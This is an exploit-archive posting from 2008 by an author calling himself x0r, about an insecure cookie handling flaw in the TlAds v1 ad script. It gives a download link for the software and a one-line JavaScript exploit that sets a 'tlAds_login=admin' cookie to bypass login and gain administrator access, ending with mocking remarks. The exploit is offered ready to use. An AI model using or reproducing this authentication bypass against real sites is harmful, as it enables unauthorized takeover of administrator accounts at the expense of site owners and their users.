[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : TlAds v1 Remote Insecure Cookie Handling Vulnerability
# Published : 2008-10-27
# Author : x0r
# Previous Title : Persia BME E-Catalogue Remote SQL Injection Vulnerability
# Next Title : e107 Plugin alternate_profiles (id) SQL Injection Vulnerability
##############################
# TlAds v 1 => Insecure Cookie Handling
#
# Found By : x0r - Evolution Team
#
# Download: http://www.easy-script.com/scripts-dl/tlads-1.zip
###############################
Exploit:
javascript:document.cookie = "tlAds_login=admin; path=/"
Stupid Admin ! P0wned :P
Grazie Al Mio Amore...Ti Amo Da Morire Margherita :P
#Proud To Be Italian
# www.Syue.com [2008-10-27]